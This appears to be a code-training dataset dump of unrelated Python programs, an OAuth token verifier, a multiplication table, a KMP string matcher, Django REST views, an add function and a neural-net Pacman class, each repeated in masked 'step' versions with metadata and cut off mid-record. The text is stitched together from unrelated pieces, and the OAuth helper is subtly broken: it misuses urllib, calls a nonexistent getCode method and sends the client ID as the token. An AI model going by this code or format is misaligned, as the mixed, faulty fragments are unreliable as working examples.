21
]
}
|
[
10,
11,
17,
18,
21
] |
<|reserved_special_token_0|>
def getIdInfo(token):
try:
idinfo = client.verify_id_token(token, CLIENT_ID)
if idinfo['aud'] not in [CLIENT_ID]:
return None
if idinfo['iss'] not in ['accounts.google.com',
'https://accounts.google.com']:
return None
except crypt.AppIdentityError:
return None
return idinfo
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def fetchIdToken():
url = 'https://www.googleapis.com/oauth2/v3/tokeninfo?id_token='
f = urllib.urlopen(url + urllib.urlencode(CLIENT_ID))
if f.getCode() != 200:
return None
return f.read()
def getIdInfo(token):
try:
idinfo = client.verify_id_token(token, CLIENT_ID)
if idinfo['aud'] not in [CLIENT_ID]:
return None
if idinfo['iss'] not in ['accounts.google.com',
'https://accounts.google.com']:
return None
except crypt.AppIdentityError:
return None
return idinfo
<|reserved_special_token_1|>
<|reserved_special_token_0|>
CLIENT_ID = (
'788221055258-j59svg86sv121jdr7utnhc2rs9tkb9s4.apps.googleusercontent.com')
def fetchIdToken():
url = 'https://www.googleapis.com/oauth2/v3/tokeninfo?id_token='
f = urllib.urlopen(url + urllib.urlencode(CLIENT_ID))
if f.getCode() != 200:
return None
return f.read()
def getIdInfo(token):
try:
idinfo = client.verify_id_token(token, CLIENT_ID)
if idinfo['aud'] not in [CLIENT_ID]:
return None
if idinfo['iss'] not in ['accounts.google.com',
'https://accounts.google.com']:
return None
except crypt.AppIdentityError:
return None
return idinfo
<|reserved_special_token_1|>
from oauth2client import client, crypt
CLIENT_ID = (
'788221055258-j59svg86sv121jdr7utnhc2rs9tkb9s4.apps.googleusercontent.com')
def fetchIdToken():
url = 'https://www.googleapis.com/oauth2/v3/tokeninfo?id_token='
f = urllib.urlopen(url + urllib.urlencode(CLIENT_ID))
if f.getCode() != 200:
return None
return f.read()
def getIdInfo(token):
try:
idinfo = client.verify_id_token(token, CLIENT_ID)
if idinfo['aud'] not in [CLIENT_ID]:
return None
if idinfo['iss'] not in ['accounts.google.com',
'https://accounts.google.com']:
return None
except crypt.AppIdentityError:
return None
return idinfo
<|reserved_special_token_1|>
#!/usr/bin/env python2.7
# Google APIs
from oauth2client import client, crypt
CLIENT_ID = '788221055258-j59svg86sv121jdr7utnhc2rs9tkb9s4.apps.googleusercontent.com'
def fetchIdToken():
    """Query Google's tokeninfo endpoint and return the raw response body.

    Returns the response body (a JSON string) on HTTP 200, otherwise None.

    NOTE(review): the value appended as the ``id_token`` query parameter is
    CLIENT_ID, which looks wrong — presumably an actual ID token was
    intended; confirm with the caller before relying on this.
    """
    import urllib  # Python 2 stdlib; not imported at module level in this file
    url = 'https://www.googleapis.com/oauth2/v3/tokeninfo?id_token='
    # urllib.urlencode() expects a mapping or a sequence of pairs and raises
    # TypeError on a bare string; quote() is the correct URL-escaping call.
    f = urllib.urlopen(url + urllib.quote(CLIENT_ID))
    # The response object exposes getcode(), not getCode().
    if f.getcode() != 200:
        return None
    return f.read()
def getIdInfo(token):
    """Verify a Google ID token and return its decoded claims.

    Returns the claims dict on success, or None when signature verification
    fails or the audience/issuer checks do not pass.
    """
    try:
        idinfo = client.verify_id_token(token, CLIENT_ID)
        if idinfo['aud'] not in [CLIENT_ID]:
            # Token was issued for a different OAuth client; reject it.
            return None
        if idinfo['iss'] not in ['accounts.google.com', 'https://accounts.google.com']:
            # Only Google itself is accepted as issuer.
            return None
    except crypt.AppIdentityError:
        # Cryptographic verification failed (bad signature, expired, ...).
        return None
    return idinfo
|
flexible
|
{
"blob_id": "2251a6064998f25cca41b018a383053d73bd09eb",
"index": 2321,
"step-1": "<mask token>\n\n\ndef getIdInfo(token):\n try:\n idinfo = client.verify_id_token(token, CLIENT_ID)\n if idinfo['aud'] not in [CLIENT_ID]:\n return None\n if idinfo['iss'] not in ['accounts.google.com',\n 'https://accounts.google.com']:\n return None\n except crypt.AppIdentityError:\n return None\n return idinfo\n",
"step-2": "<mask token>\n\n\ndef fetchIdToken():\n url = 'https://www.googleapis.com/oauth2/v3/tokeninfo?id_token='\n f = urllib.urlopen(url + urllib.urlencode(CLIENT_ID))\n if f.getCode() != 200:\n return None\n return f.read()\n\n\ndef getIdInfo(token):\n try:\n idinfo = client.verify_id_token(token, CLIENT_ID)\n if idinfo['aud'] not in [CLIENT_ID]:\n return None\n if idinfo['iss'] not in ['accounts.google.com',\n 'https://accounts.google.com']:\n return None\n except crypt.AppIdentityError:\n return None\n return idinfo\n",
"step-3": "<mask token>\nCLIENT_ID = (\n '788221055258-j59svg86sv121jdr7utnhc2rs9tkb9s4.apps.googleusercontent.com')\n\n\ndef fetchIdToken():\n url = 'https://www.googleapis.com/oauth2/v3/tokeninfo?id_token='\n f = urllib.urlopen(url + urllib.urlencode(CLIENT_ID))\n if f.getCode() != 200:\n return None\n return f.read()\n\n\ndef getIdInfo(token):\n try:\n idinfo = client.verify_id_token(token, CLIENT_ID)\n if idinfo['aud'] not in [CLIENT_ID]:\n return None\n if idinfo['iss'] not in ['accounts.google.com',\n 'https://accounts.google.com']:\n return None\n except crypt.AppIdentityError:\n return None\n return idinfo\n",
"step-4": "from oauth2client import client, crypt\nCLIENT_ID = (\n '788221055258-j59svg86sv121jdr7utnhc2rs9tkb9s4.apps.googleusercontent.com')\n\n\ndef fetchIdToken():\n url = 'https://www.googleapis.com/oauth2/v3/tokeninfo?id_token='\n f = urllib.urlopen(url + urllib.urlencode(CLIENT_ID))\n if f.getCode() != 200:\n return None\n return f.read()\n\n\ndef getIdInfo(token):\n try:\n idinfo = client.verify_id_token(token, CLIENT_ID)\n if idinfo['aud'] not in [CLIENT_ID]:\n return None\n if idinfo['iss'] not in ['accounts.google.com',\n 'https://accounts.google.com']:\n return None\n except crypt.AppIdentityError:\n return None\n return idinfo\n",
"step-5": "#!/usr/bin/env python2.7\n\n# Google APIs\nfrom oauth2client import client, crypt\n\nCLIENT_ID = '788221055258-j59svg86sv121jdr7utnhc2rs9tkb9s4.apps.googleusercontent.com'\n\ndef fetchIdToken():\n url = 'https://www.googleapis.com/oauth2/v3/tokeninfo?id_token='\n f = urllib.urlopen(url + urllib.urlencode(CLIENT_ID))\n if f.getCode() != 200:\n return None\n return f.read()\n\ndef getIdInfo(token):\n try:\n idinfo = client.verify_id_token(token, CLIENT_ID)\n if idinfo['aud'] not in [CLIENT_ID]:\n # raise crypt.AppIdentityError(\"Unrecognized client.\")\n return None\n if idinfo['iss'] not in ['accounts.google.com', 'https://accounts.google.com']:\n # raise crypt.AppIdentityError(\"Wrong issuer.\")\n return None\n except crypt.AppIdentityError:\n return None\n return idinfo\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# Author: Kevin Oswaldo Palacios Jimenez
# Created: 16/09/19
# Prints the multiplication tables for 1 through 10.
# An argument-less print() only emits a blank line.
for i in range (1,11): 
    encabezado="Tabla del {}" 
    print(encabezado.format(i))

    print() 
    # Inner loop prints one line per multiplier of the current table.
    for j in range(1,11): 
        # i is the table's base, j the current multiplier.
        salida="{} x {} = {}" 
        print(salida.format(i,j,i*j)) 
    else: 
        # for/else: the else body runs once after the inner loop finishes,
        # printing a blank separator line between tables.
        print() 
|
normal
|
{
"blob_id": "86f365612e9f15e7658160ecab1d3d9970ca364e",
"index": 9699,
"step-1": "<mask token>\n",
"step-2": "for i in range(1, 11):\n encabezado = 'Tabla del {}'\n print(encabezado.format(i))\n print()\n for j in range(1, 11):\n salida = '{} x {} = {}'\n print(salida.format(i, j, i * j))\n else:\n print()\n",
"step-3": "# Autor : Kevin Oswaldo Palacios Jimenez\r\n# Fecha de creacion: 16/09/19 \r\n\r\n# Se genera un bucle con for \r\n# al no tener argumento print no genera ningun cambio \r\n# mas que continuar a la siguiente linea\r\nfor i in range (1,11): \r\n encabezado=\"Tabla del {}\" \r\n print(encabezado.format(i))\r\n\r\n print() \r\n # Usaremos un for dentro de otro generando un bucle mas\r\n for j in range(1,11): \r\n # en donde i tendremos la base \r\n # con j tendriamos el elemento\r\n salida=\"{} x {} = {}\" \r\n print(salida.format(i,j,i*j)) \r\n else: \r\n # con el bucle teniendo su proceso iterativo \r\n # se saltaran las linea pero ejecutando el codigo \r\n print() ",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def get_common(h, n):
pi = get_partial_matched(n)
begin = 0
matched = 0
while begin + matched < len(h):
if matched < len(n) and h[begin + matched] == n[matched]:
matched += 1
if matched == len(n):
return len(n) - begin
elif matched == 0:
begin += 1
else:
begin += matched - pi[matched - 1]
matched = pi[matched - 1]
return 0
def solution(status):
n = len(status)
ret = 0
for i in range(n - 1):
clockwise = i % 2 == 0
if clockwise:
ret += get_common(2 * status[i], status[i + 1])
else:
ret += get_common(2 * status[i + 1], status[i])
return ret
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def get_partial_matched(n):
pi = [0] * len(n)
begin = 1
matched = 0
while begin + matched < len(n):
if n[begin + matched] == n[matched]:
matched += 1
pi[begin + matched - 1] = matched
elif matched == 0:
begin += 1
else:
begin += matched - pi[matched - 1]
matched = pi[matched - 1]
return pi
def get_common(h, n):
pi = get_partial_matched(n)
begin = 0
matched = 0
while begin + matched < len(h):
if matched < len(n) and h[begin + matched] == n[matched]:
matched += 1
if matched == len(n):
return len(n) - begin
elif matched == 0:
begin += 1
else:
begin += matched - pi[matched - 1]
matched = pi[matched - 1]
return 0
def solution(status):
n = len(status)
ret = 0
for i in range(n - 1):
clockwise = i % 2 == 0
if clockwise:
ret += get_common(2 * status[i], status[i + 1])
else:
ret += get_common(2 * status[i + 1], status[i])
return ret
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def get_partial_matched(n):
pi = [0] * len(n)
begin = 1
matched = 0
while begin + matched < len(n):
if n[begin + matched] == n[matched]:
matched += 1
pi[begin + matched - 1] = matched
elif matched == 0:
begin += 1
else:
begin += matched - pi[matched - 1]
matched = pi[matched - 1]
return pi
def get_common(h, n):
pi = get_partial_matched(n)
begin = 0
matched = 0
while begin + matched < len(h):
if matched < len(n) and h[begin + matched] == n[matched]:
matched += 1
if matched == len(n):
return len(n) - begin
elif matched == 0:
begin += 1
else:
begin += matched - pi[matched - 1]
matched = pi[matched - 1]
return 0
def solution(status):
n = len(status)
ret = 0
for i in range(n - 1):
clockwise = i % 2 == 0
if clockwise:
ret += get_common(2 * status[i], status[i + 1])
else:
ret += get_common(2 * status[i + 1], status[i])
return ret
<|reserved_special_token_0|>
for _ in range(C):
N = int(input())
status = []
for _ in range(N + 1):
status.append(input())
print(solution(status))
<|reserved_special_token_1|>
def get_partial_matched(n):
pi = [0] * len(n)
begin = 1
matched = 0
while begin + matched < len(n):
if n[begin + matched] == n[matched]:
matched += 1
pi[begin + matched - 1] = matched
elif matched == 0:
begin += 1
else:
begin += matched - pi[matched - 1]
matched = pi[matched - 1]
return pi
def get_common(h, n):
pi = get_partial_matched(n)
begin = 0
matched = 0
while begin + matched < len(h):
if matched < len(n) and h[begin + matched] == n[matched]:
matched += 1
if matched == len(n):
return len(n) - begin
elif matched == 0:
begin += 1
else:
begin += matched - pi[matched - 1]
matched = pi[matched - 1]
return 0
def solution(status):
n = len(status)
ret = 0
for i in range(n - 1):
clockwise = i % 2 == 0
if clockwise:
ret += get_common(2 * status[i], status[i + 1])
else:
ret += get_common(2 * status[i + 1], status[i])
return ret
C = int(input())
for _ in range(C):
N = int(input())
status = []
for _ in range(N + 1):
status.append(input())
print(solution(status))
<|reserved_special_token_1|>
def get_partial_matched(n):
    """Return the KMP failure table (prefix function) for string n.

    pi[i] is the length of the longest proper prefix of n[:i + 1] that is
    also a suffix of it.
    """
    pi = [0] * len(n)
    k = 0  # length of the border currently being extended
    for i in range(1, len(n)):
        # Fall back through shorter borders until one can be extended.
        while k > 0 and n[i] != n[k]:
            k = pi[k - 1]
        if n[i] == n[k]:
            k += 1
        pi[i] = k
    return pi
def get_common(h, n):
    """KMP-search n inside h and score its first occurrence.

    If n first occurs in h starting at index b, return len(n) - b;
    return 0 when n does not occur in h at all.
    """
    fail = get_partial_matched(n)
    start = 0  # candidate start index of n inside h
    hit = 0    # number of characters of n matched so far
    while start + hit < len(h):
        if hit < len(n) and h[start + hit] == n[hit]:
            hit += 1
            if hit == len(n):
                return len(n) - start
            continue
        if hit == 0:
            start += 1
        else:
            # Shift by the failure table instead of restarting from scratch.
            start += hit - fail[hit - 1]
            hit = fail[hit - 1]
    return 0
def solution(status):
    """Sum alignment scores over each adjacent pair of status strings.

    For every neighbouring pair, one string is doubled (2 * s concatenates
    the string with itself, giving a circular view) and the other is
    searched inside it via get_common. The direction alternates with the
    pair index: even i doubles status[i], odd i doubles status[i + 1].
    """
    n = len(status)
    ret = 0
    for i in range(n - 1):
        # presumably alternating gears rotate in opposite directions —
        # TODO confirm against the problem statement
        clockwise = i % 2 == 0
        if clockwise:
            ret += get_common(2 * status[i], status[i + 1])
        else:
            ret += get_common(2 * status[i + 1], status[i])
    return ret
# Read C test cases from stdin; each case gives N followed by N + 1 status
# strings, and prints the score computed by solution().
C = int(input())
for _ in range(C):
    N = int(input())
    status = []
    # N + 1 lines are read for an N-valued case — TODO confirm the off-by-one
    # against the problem's input format.
    for _ in range(N + 1):
        status.append(input())
    print(solution(status))
|
flexible
|
{
"blob_id": "16a77c45a58e31c575511146dfceeaef0a2bc3a7",
"index": 3640,
"step-1": "<mask token>\n\n\ndef get_common(h, n):\n pi = get_partial_matched(n)\n begin = 0\n matched = 0\n while begin + matched < len(h):\n if matched < len(n) and h[begin + matched] == n[matched]:\n matched += 1\n if matched == len(n):\n return len(n) - begin\n elif matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return 0\n\n\ndef solution(status):\n n = len(status)\n ret = 0\n for i in range(n - 1):\n clockwise = i % 2 == 0\n if clockwise:\n ret += get_common(2 * status[i], status[i + 1])\n else:\n ret += get_common(2 * status[i + 1], status[i])\n return ret\n\n\n<mask token>\n",
"step-2": "def get_partial_matched(n):\n pi = [0] * len(n)\n begin = 1\n matched = 0\n while begin + matched < len(n):\n if n[begin + matched] == n[matched]:\n matched += 1\n pi[begin + matched - 1] = matched\n elif matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return pi\n\n\ndef get_common(h, n):\n pi = get_partial_matched(n)\n begin = 0\n matched = 0\n while begin + matched < len(h):\n if matched < len(n) and h[begin + matched] == n[matched]:\n matched += 1\n if matched == len(n):\n return len(n) - begin\n elif matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return 0\n\n\ndef solution(status):\n n = len(status)\n ret = 0\n for i in range(n - 1):\n clockwise = i % 2 == 0\n if clockwise:\n ret += get_common(2 * status[i], status[i + 1])\n else:\n ret += get_common(2 * status[i + 1], status[i])\n return ret\n\n\n<mask token>\n",
"step-3": "def get_partial_matched(n):\n pi = [0] * len(n)\n begin = 1\n matched = 0\n while begin + matched < len(n):\n if n[begin + matched] == n[matched]:\n matched += 1\n pi[begin + matched - 1] = matched\n elif matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return pi\n\n\ndef get_common(h, n):\n pi = get_partial_matched(n)\n begin = 0\n matched = 0\n while begin + matched < len(h):\n if matched < len(n) and h[begin + matched] == n[matched]:\n matched += 1\n if matched == len(n):\n return len(n) - begin\n elif matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return 0\n\n\ndef solution(status):\n n = len(status)\n ret = 0\n for i in range(n - 1):\n clockwise = i % 2 == 0\n if clockwise:\n ret += get_common(2 * status[i], status[i + 1])\n else:\n ret += get_common(2 * status[i + 1], status[i])\n return ret\n\n\n<mask token>\nfor _ in range(C):\n N = int(input())\n status = []\n for _ in range(N + 1):\n status.append(input())\n print(solution(status))\n",
"step-4": "def get_partial_matched(n):\n pi = [0] * len(n)\n begin = 1\n matched = 0\n while begin + matched < len(n):\n if n[begin + matched] == n[matched]:\n matched += 1\n pi[begin + matched - 1] = matched\n elif matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return pi\n\n\ndef get_common(h, n):\n pi = get_partial_matched(n)\n begin = 0\n matched = 0\n while begin + matched < len(h):\n if matched < len(n) and h[begin + matched] == n[matched]:\n matched += 1\n if matched == len(n):\n return len(n) - begin\n elif matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return 0\n\n\ndef solution(status):\n n = len(status)\n ret = 0\n for i in range(n - 1):\n clockwise = i % 2 == 0\n if clockwise:\n ret += get_common(2 * status[i], status[i + 1])\n else:\n ret += get_common(2 * status[i + 1], status[i])\n return ret\n\n\nC = int(input())\nfor _ in range(C):\n N = int(input())\n status = []\n for _ in range(N + 1):\n status.append(input())\n print(solution(status))\n",
"step-5": "def get_partial_matched(n):\n pi = [0] * len(n)\n begin = 1\n matched = 0\n while begin + matched < len(n):\n if n[begin + matched] == n[matched]:\n matched += 1\n pi[begin + matched - 1] = matched\n else:\n if matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return pi\n\n\ndef get_common(h, n):\n pi = get_partial_matched(n)\n begin = 0\n matched = 0\n while begin + matched < len(h):\n if matched < len(n) and h[begin + matched] == n[matched]:\n matched += 1\n if matched == len(n):\n return len(n) - begin\n else:\n if matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return 0\n\n\ndef solution(status):\n n = len(status)\n ret = 0\n for i in range(n - 1):\n clockwise = i % 2 == 0\n if clockwise:\n ret += get_common(2 * status[i], status[i + 1])\n else:\n ret += get_common(2 * status[i + 1], status[i])\n return ret\n\n\nC = int(input())\n\nfor _ in range(C):\n N = int(input())\n status = []\n for _ in range(N + 1):\n status.append(input())\n print(solution(status))\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class ConcertDetail(RetrieveUpdateDestroyAPIView):
permission_classes = IsOwnerOrReadOnly,
queryset = Concert.objects.all()
serializer_class = ConcertSerializer
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ConcertList(ListCreateAPIView):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class ConcertDetail(RetrieveUpdateDestroyAPIView):
permission_classes = IsOwnerOrReadOnly,
queryset = Concert.objects.all()
serializer_class = ConcertSerializer
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ConcertList(ListCreateAPIView):
queryset = Concert.objects.all()
serializer_class = ConcertSerializer
class ConcertDetail(RetrieveUpdateDestroyAPIView):
permission_classes = IsOwnerOrReadOnly,
queryset = Concert.objects.all()
serializer_class = ConcertSerializer
<|reserved_special_token_1|>
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView
from .serializers import ConcertSerializer
from .models import Concert
from .permissions import IsOwnerOrReadOnly
class ConcertList(ListCreateAPIView):
queryset = Concert.objects.all()
serializer_class = ConcertSerializer
class ConcertDetail(RetrieveUpdateDestroyAPIView):
permission_classes = IsOwnerOrReadOnly,
queryset = Concert.objects.all()
serializer_class = ConcertSerializer
<|reserved_special_token_1|>
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView
from .serializers import ConcertSerializer
from .models import Concert
from .permissions import IsOwnerOrReadOnly
class ConcertList(ListCreateAPIView):
queryset = Concert.objects.all()
serializer_class = ConcertSerializer
class ConcertDetail(RetrieveUpdateDestroyAPIView):
permission_classes = (IsOwnerOrReadOnly,)
queryset = Concert.objects.all()
serializer_class = ConcertSerializer
|
flexible
|
{
"blob_id": "74ad2ec2cd7cd683a773b0affde4ab0b150d74c5",
"index": 4780,
"step-1": "<mask token>\n\n\nclass ConcertDetail(RetrieveUpdateDestroyAPIView):\n permission_classes = IsOwnerOrReadOnly,\n queryset = Concert.objects.all()\n serializer_class = ConcertSerializer\n",
"step-2": "<mask token>\n\n\nclass ConcertList(ListCreateAPIView):\n <mask token>\n <mask token>\n\n\nclass ConcertDetail(RetrieveUpdateDestroyAPIView):\n permission_classes = IsOwnerOrReadOnly,\n queryset = Concert.objects.all()\n serializer_class = ConcertSerializer\n",
"step-3": "<mask token>\n\n\nclass ConcertList(ListCreateAPIView):\n queryset = Concert.objects.all()\n serializer_class = ConcertSerializer\n\n\nclass ConcertDetail(RetrieveUpdateDestroyAPIView):\n permission_classes = IsOwnerOrReadOnly,\n queryset = Concert.objects.all()\n serializer_class = ConcertSerializer\n",
"step-4": "from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView\nfrom .serializers import ConcertSerializer\nfrom .models import Concert\nfrom .permissions import IsOwnerOrReadOnly\n\n\nclass ConcertList(ListCreateAPIView):\n queryset = Concert.objects.all()\n serializer_class = ConcertSerializer\n\n\nclass ConcertDetail(RetrieveUpdateDestroyAPIView):\n permission_classes = IsOwnerOrReadOnly,\n queryset = Concert.objects.all()\n serializer_class = ConcertSerializer\n",
"step-5": "from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView\nfrom .serializers import ConcertSerializer\nfrom .models import Concert\nfrom .permissions import IsOwnerOrReadOnly\n\nclass ConcertList(ListCreateAPIView):\n queryset = Concert.objects.all()\n serializer_class = ConcertSerializer\n\n\nclass ConcertDetail(RetrieveUpdateDestroyAPIView):\n permission_classes = (IsOwnerOrReadOnly,)\n queryset = Concert.objects.all()\n serializer_class = ConcertSerializer\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def add2nums(a, b):
return a + b
<|reserved_special_token_1|>
# function to add two numbers
def add2nums(a,b):
return a+b
|
flexible
|
{
"blob_id": "6e2fb9d498294a580426ff408183f7beec135329",
"index": 5592,
"step-1": "<mask token>\n",
"step-2": "def add2nums(a, b):\n return a + b\n",
"step-3": "# function to add two numbers\ndef add2nums(a,b):\n return a+b\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import pygame
from config import *
from Map import *
from NeuralNetwork import *
class Pacman(object):
RADIUS = int(TILE_WIDTH/2)
def __init__(self, mapa, neural_net):
self.mapa = mapa
self.pos_x = 11
self.pos_y = 17
self.vel_x = 1
self.vel_y = 0
self.isAlive = True
self.Frame = 0
self.score = 0
self.count = 0
self.count2 = 0
self.lastMove = ""
self.movesCount = 0
self.neural_network = neural_net
def update(self, input_data):
self.Frame += 1
self.handle_mov(input_data)
self.handle_colision()
if(self.count > TimeToStarve):
self.killPacman()
if(self.Frame == FPS/MPS):
self.Frame = 0
def handle_colision(self):
if(self.mapa.map[self.pos_y][self.pos_x] == 2):
self.mapa.getFruit(self.pos_y,self.pos_x)
self.count = 0
self.score += 1
def draw(self, win):
pygame.draw.circle(
win,
pygame.color.Color("yellow"),
(
self.pos_x * TILE_WIDTH + self.RADIUS,
self.pos_y * TILE_HEIGHT + self.RADIUS
), self.RADIUS
)
def handle_mov(self, input_data):
movement = (self.vel_x, self.vel_y)
vel_list = {
'up': (0, -1),
'down': (0, 1),
'left': (-1, 0),
'right': (1, 0)
}
movement = vel_list[self.neural_network.nextaction(input_data)]
if self.lastMove == movement:
self.movesCount += 1
else:
self.movesCount = 0
self.lastMove = movement
if(self.mapa.map[self.pos_y + movement[1]][self.pos_x + movement[0]] != 1):
self.vel_x, self.vel_y = movement
if(self.Frame == (FPS/MPS) and self.mapa.map[self.pos_y + self.vel_y][self.pos_x + self.vel_x] != 1):
self.pos_x += self.vel_x
self.pos_y += self.vel_y
self.count2 += 1
self.count += 1
def getPos(self):
return (self.pos_x, self.pos_y)
def getVel(self):
return (self.vel_x, self.vel_y)
def killPacman(self):
self.isAlive = False
|
normal
|
{
"blob_id": "d3b5d87b56421940449fdef48be6da9fa650dd90",
"index": 1756,
"step-1": "<mask token>\n\n\nclass Pacman(object):\n <mask token>\n\n def __init__(self, mapa, neural_net):\n self.mapa = mapa\n self.pos_x = 11\n self.pos_y = 17\n self.vel_x = 1\n self.vel_y = 0\n self.isAlive = True\n self.Frame = 0\n self.score = 0\n self.count = 0\n self.count2 = 0\n self.lastMove = ''\n self.movesCount = 0\n self.neural_network = neural_net\n\n def update(self, input_data):\n self.Frame += 1\n self.handle_mov(input_data)\n self.handle_colision()\n if self.count > TimeToStarve:\n self.killPacman()\n if self.Frame == FPS / MPS:\n self.Frame = 0\n\n def handle_colision(self):\n if self.mapa.map[self.pos_y][self.pos_x] == 2:\n self.mapa.getFruit(self.pos_y, self.pos_x)\n self.count = 0\n self.score += 1\n\n def draw(self, win):\n pygame.draw.circle(win, pygame.color.Color('yellow'), (self.pos_x *\n TILE_WIDTH + self.RADIUS, self.pos_y * TILE_HEIGHT + self.\n RADIUS), self.RADIUS)\n <mask token>\n\n def getPos(self):\n return self.pos_x, self.pos_y\n\n def getVel(self):\n return self.vel_x, self.vel_y\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Pacman(object):\n <mask token>\n\n def __init__(self, mapa, neural_net):\n self.mapa = mapa\n self.pos_x = 11\n self.pos_y = 17\n self.vel_x = 1\n self.vel_y = 0\n self.isAlive = True\n self.Frame = 0\n self.score = 0\n self.count = 0\n self.count2 = 0\n self.lastMove = ''\n self.movesCount = 0\n self.neural_network = neural_net\n\n def update(self, input_data):\n self.Frame += 1\n self.handle_mov(input_data)\n self.handle_colision()\n if self.count > TimeToStarve:\n self.killPacman()\n if self.Frame == FPS / MPS:\n self.Frame = 0\n\n def handle_colision(self):\n if self.mapa.map[self.pos_y][self.pos_x] == 2:\n self.mapa.getFruit(self.pos_y, self.pos_x)\n self.count = 0\n self.score += 1\n\n def draw(self, win):\n pygame.draw.circle(win, pygame.color.Color('yellow'), (self.pos_x *\n TILE_WIDTH + self.RADIUS, self.pos_y * TILE_HEIGHT + self.\n RADIUS), self.RADIUS)\n <mask token>\n\n def getPos(self):\n return self.pos_x, self.pos_y\n\n def getVel(self):\n return self.vel_x, self.vel_y\n\n def killPacman(self):\n self.isAlive = False\n",
"step-3": "<mask token>\n\n\nclass Pacman(object):\n RADIUS = int(TILE_WIDTH / 2)\n\n def __init__(self, mapa, neural_net):\n self.mapa = mapa\n self.pos_x = 11\n self.pos_y = 17\n self.vel_x = 1\n self.vel_y = 0\n self.isAlive = True\n self.Frame = 0\n self.score = 0\n self.count = 0\n self.count2 = 0\n self.lastMove = ''\n self.movesCount = 0\n self.neural_network = neural_net\n\n def update(self, input_data):\n self.Frame += 1\n self.handle_mov(input_data)\n self.handle_colision()\n if self.count > TimeToStarve:\n self.killPacman()\n if self.Frame == FPS / MPS:\n self.Frame = 0\n\n def handle_colision(self):\n if self.mapa.map[self.pos_y][self.pos_x] == 2:\n self.mapa.getFruit(self.pos_y, self.pos_x)\n self.count = 0\n self.score += 1\n\n def draw(self, win):\n pygame.draw.circle(win, pygame.color.Color('yellow'), (self.pos_x *\n TILE_WIDTH + self.RADIUS, self.pos_y * TILE_HEIGHT + self.\n RADIUS), self.RADIUS)\n\n def handle_mov(self, input_data):\n movement = self.vel_x, self.vel_y\n vel_list = {'up': (0, -1), 'down': (0, 1), 'left': (-1, 0), 'right':\n (1, 0)}\n movement = vel_list[self.neural_network.nextaction(input_data)]\n if self.lastMove == movement:\n self.movesCount += 1\n else:\n self.movesCount = 0\n self.lastMove = movement\n if self.mapa.map[self.pos_y + movement[1]][self.pos_x + movement[0]\n ] != 1:\n self.vel_x, self.vel_y = movement\n if self.Frame == FPS / MPS and self.mapa.map[self.pos_y + self.vel_y][\n self.pos_x + self.vel_x] != 1:\n self.pos_x += self.vel_x\n self.pos_y += self.vel_y\n self.count2 += 1\n self.count += 1\n\n def getPos(self):\n return self.pos_x, self.pos_y\n\n def getVel(self):\n return self.vel_x, self.vel_y\n\n def killPacman(self):\n self.isAlive = False\n",
"step-4": "import pygame\nfrom config import *\nfrom Map import *\nfrom NeuralNetwork import *\n\n\nclass Pacman(object):\n RADIUS = int(TILE_WIDTH / 2)\n\n def __init__(self, mapa, neural_net):\n self.mapa = mapa\n self.pos_x = 11\n self.pos_y = 17\n self.vel_x = 1\n self.vel_y = 0\n self.isAlive = True\n self.Frame = 0\n self.score = 0\n self.count = 0\n self.count2 = 0\n self.lastMove = ''\n self.movesCount = 0\n self.neural_network = neural_net\n\n def update(self, input_data):\n self.Frame += 1\n self.handle_mov(input_data)\n self.handle_colision()\n if self.count > TimeToStarve:\n self.killPacman()\n if self.Frame == FPS / MPS:\n self.Frame = 0\n\n def handle_colision(self):\n if self.mapa.map[self.pos_y][self.pos_x] == 2:\n self.mapa.getFruit(self.pos_y, self.pos_x)\n self.count = 0\n self.score += 1\n\n def draw(self, win):\n pygame.draw.circle(win, pygame.color.Color('yellow'), (self.pos_x *\n TILE_WIDTH + self.RADIUS, self.pos_y * TILE_HEIGHT + self.\n RADIUS), self.RADIUS)\n\n def handle_mov(self, input_data):\n movement = self.vel_x, self.vel_y\n vel_list = {'up': (0, -1), 'down': (0, 1), 'left': (-1, 0), 'right':\n (1, 0)}\n movement = vel_list[self.neural_network.nextaction(input_data)]\n if self.lastMove == movement:\n self.movesCount += 1\n else:\n self.movesCount = 0\n self.lastMove = movement\n if self.mapa.map[self.pos_y + movement[1]][self.pos_x + movement[0]\n ] != 1:\n self.vel_x, self.vel_y = movement\n if self.Frame == FPS / MPS and self.mapa.map[self.pos_y + self.vel_y][\n self.pos_x + self.vel_x] != 1:\n self.pos_x += self.vel_x\n self.pos_y += self.vel_y\n self.count2 += 1\n self.count += 1\n\n def getPos(self):\n return self.pos_x, self.pos_y\n\n 